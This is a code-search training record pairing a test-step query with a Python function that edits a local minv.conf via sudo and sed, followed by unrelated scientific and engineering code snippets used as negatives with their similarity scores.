cast(CombLogicTimingTB, self.make_tbm(CombLogicTimingTB, tbm_specs))\n sim_results = await self.async_simulate_tbm_obj(f'sim_inv_pseg_{inv_pseg}_{env}',\n dut, tbm, tb_params)\n tdr_cur, tdf_cur = CombLogicTimingTB.get_output_delay(sim_results.data, tbm.specs,\n 'in',\n 'out', False, in_pwr='vdd_in',\n out_pwr='vdd')\n\n '''\n plt.figure()\n plt.plot(sim_results.data['time'].flatten(), sim_results.data['in'].flatten(), 'b')\n plt.plot(sim_results.data['time'].flatten(), sim_results.data['inb_buf'].flatten(), 'g')\n plt.plot(sim_results.data['time'].flatten(), sim_results.data['in_buf'].flatten(), 'r')\n plt.plot(sim_results.data['time'].flatten(), sim_results.data['midn'].flatten(), 'k')\n plt.plot(sim_results.data['time'].flatten(), sim_results.data['midp'].flatten(), 'c')\n plt.plot(sim_results.data['time'].flatten(), sim_results.data['out'].flatten(), 'm')\n plt.legend(['in', 'inb_buf', 'in_buf', 'midn', 'midp', 'out'])\n plt.title(f'pseg_off: {pseg_off}, pseg: {inv_pseg}, nseg: {inv_nseg-pseg_off}, fanout: {fanout}')\n plt.show(block=False)\n '''\n\n # Error checking\n if math.isinf(np.max(tdr_cur)) or math.isinf(np.max(tdf_cur)):\n raise ValueError(\"Got infinite delay!\")\n if np.min(tdr_cur) < 0 or np.min(tdf_cur) < 0:\n raise ValueError(\"Got negative delay.\")\n\n err_cur = np.abs(tdr_cur[0] - tdf_cur[0])\n if err_cur > err_worst:\n err_worst = err_cur\n worst_env = env\n tdr = tdr_cur[0]\n tdf = tdf_cur[0]\n\n '''\n print(f'iter: {inv_pseg}')\n print(f'env: {worst_env}, tdr: {tdr}, tdf: {tdf}')\n breakpoint()\n '''\n\n if tdr < tdf:\n iterator.down(tdr - tdf, False)\n else:\n iterator.up(tdr - tdf, False)\n\n err_abs = np.abs(tdr - tdf)\n if err_abs < err_best:\n err_best = err_abs\n iterator.save_info(pseg_off)\n\n pseg_off = iterator.get_last_save_info()\n pseg_off = 0 if pseg_off is None else pseg_off # Should only hit this case if inv_pseg_nom = 1\n inv_pseg = inv_pseg_nom + pseg_off\n\n return inv_pseg, inv_nseg - 0 * pseg_off", "def calc_T_sys(nu_obs):\n return 100 * u.K + 120 * (nu_obs / (150 * u.MHz))**(-2.55) * u.K", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = 
list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) ~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "def test_generate_nb(self):\n pass", "def set_T_lm(self):\n self.delta_T_lm_array = ( ((self.exh.T_outlet_array -\n self.cool.T_inlet_array) - (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) / np.log((self.exh.T_outlet_array -\n self.cool.T_inlet_array) / (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) )", "def gen_new_phiw_div_phib_arr(N_PROCESSES, phiw_div_phib_arr_new, 
cond_GT, fcn_D, fcn_eta, z_div_L_arr, phiw_div_phib_arr, Pi_div_DLP_arr, weight, gp_arr, gm_arr, yt_arr, phi_yt_arr, ID_yt_arr, Ieta_yt_arr):\n phi_b = cond_GT['phi_bulk']\n ed = cond_GT['epsilon_d']\n membrane_geometry = cond_GT['membrane_geometry']\n \n Ny = size(yt_arr)\n # # Python allocate the name for phi_yt_arr[0], this is the same as reference value for C++ \" y= &x\"\n phi_arr_z0 = phi_yt_arr[0]\n Ieta_arr_z0= Ieta_yt_arr[0]\n ID_arr_z0 = ID_yt_arr[0]\n\n ind_z0 = 0 #z-index at inlet\n \n z0_div_L = 0. #z-coord at inlet\n \n r0_div_R = 0. #r-coord at the centerline of pipe\n rw_div_R = 1. #r-coord at the membrane wall\n \n vw_div_vw0_z0 = get_v_conv(rw_div_R, z0_div_L, Pi_div_DLP_arr[ind_z0], cond_GT, gp_arr[ind_z0], gm_arr[ind_z0])\n gen_phi_wrt_yt(z0_div_L, phiw_div_phib_arr[ind_z0]*phi_b, fcn_D, vw_div_vw0_z0, yt_arr, phi_arr_z0, cond_GT)\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, Ieta_arr_z0, fcn_eta, cond_GT)\n Ieta_arr_z0 /= Ieta_arr_z0[-1] # CHECK\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, ID_arr_z0, fcn_D, cond_GT)\n\n uZ_z0 = get_uZ_out(z0_div_L, cond_GT['k'], cond_GT['Bp'], cond_GT['Bm'], gp_arr[ind_z0], gm_arr[ind_z0])\n F2_0 = cal_F2_Z(vw_div_vw0_z0, ed, yt_arr, Ieta_arr_z0, ID_arr_z0, uZ_z0, membrane_geometry)\n\n Nz = size(z_div_L_arr)\n if (N_PROCESSES ==1):\n # when only single-processor is allocated\n for i in range(1, Nz):\n phiw_div_phib_arr_new[i] = process_at_zi(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\n else:\n # this uses multiprocessing packages\n import multiprocessing as mp\n \n pool = mp.Pool(N_PROCESSES)\n args_list = [(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\\\n for i in range(1, Nz)]\n phiw_div_phib_arr_new[1:] = pool.starmap(process_at_zi, args_list)\n pool.close()\n pool.join()\n\n cnt_EXCEED = 0 \n for i,x in enumerate(phiw_div_phib_arr_new):\n\n x = x*cond_GT['phi_bulk']\n if x > cond_GT['phi_freeze']:\n cnt_EXCEED += 1\n phiw_div_phib_arr_new[i] = cond_GT['phi_freeze']/cond_GT['phi_bulk'] # this prevent the accidently beyond the freezing concentration\n if(cnt_EXCEED>0):\n print('Warning: exceed phi_freeze %d times out of %d\\n'%(cnt_EXCEED, cond_GT['Nz']))\n\n FPI_operator(cond_GT['weight'], phiw_div_phib_arr, phiw_div_phib_arr_new, N_skip=1) # phiw(0) must be phib.\n\n return 0", "def expected_counts(p0, T, n): \n M=T.shape[0]\n if n<=M:\n return ec_matrix_vector(p0, T, n)\n else:\n return ec_geometric_series(p0, T, n)", "def solve_LF(self):\n self.u = zeros(self.N)\n self.u[0] = self.u0\n self.u[1] = self.u1\n u = self.u\n f= self.f\n dt = self.dt\n t = self.t\n N = self.N\n for n in xrange(1,N-1):\n u[n+1] = 2*dt*f(u[n],t[n]) + u[n-1]\n #return t,u", "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01" ]
[ "0.59679216", "0.5714044", "0.5704294", "0.5693948", "0.56368655", "0.5636519", "0.558531", "0.55831385", "0.5476309", "0.545802", "0.54322004", "0.541791", "0.5415495", "0.5400221", "0.53617483", "0.5336507", "0.5317923", "0.52990615", "0.529753", "0.5280693", "0.52662027", "0.5264906", "0.5263795", "0.5253147", "0.5251066", "0.52509844", "0.5237396", "0.5233447", "0.5223567", "0.5193649", "0.5188838", "0.5186153", "0.51859", "0.517726", "0.5171902", "0.51623124", "0.5161624", "0.5154487", "0.51522976", "0.5149649", "0.51485866", "0.51485515", "0.5146601", "0.5144514", "0.5136285", "0.5135406", "0.51268095", "0.5122866", "0.5113662", "0.5107399", "0.5106667", "0.5103773", "0.51036245", "0.51028526", "0.5100998", "0.50984997", "0.5094762", "0.5094426", "0.50943315", "0.50913864", "0.5086233", "0.50841075", "0.5082773", "0.50778717", "0.50712", "0.5061026", "0.5060182", "0.50566053", "0.504915", "0.50488234", "0.50423837", "0.5040596", "0.50403285", "0.5038737", "0.50373167", "0.5035186", "0.50317836", "0.502707", "0.50253683", "0.5017353", "0.50154227", "0.501487", "0.5013365", "0.5011359", "0.5009293", "0.5003139", "0.500282", "0.500241", "0.49998924", "0.49997497", "0.49892846", "0.49877205", "0.4987132", "0.49857628", "0.49828067", "0.49812287", "0.49776402", "0.49731147", "0.49713686", "0.49708137", "0.49683693" ]
0.0
-1
Implementation of TPMINVNOM00000 Step 1.3
def config(): sudo( r"sed -i '/#password=/c\password=abcdefghijklmnopq' /etc/minv/minv.conf" ) sudo( r"sed -i '/log_level = INFO/c\log_level = DEBUG' /etc/minv/minv.conf" )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n 
C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n temp_vn_array.append(vn_inte)\n return(temp_vn_array)", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n \"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n reporter.addBold(\"S=\"+hex(S))\n # Step 3. 
Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def test_get_nveto_pmts(self):\n pass", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def prove_N() -> Proof:\n # Optional Task 6.8", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. 
#self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_post_nveto_pmts(self):\n pass", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. 
#self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n 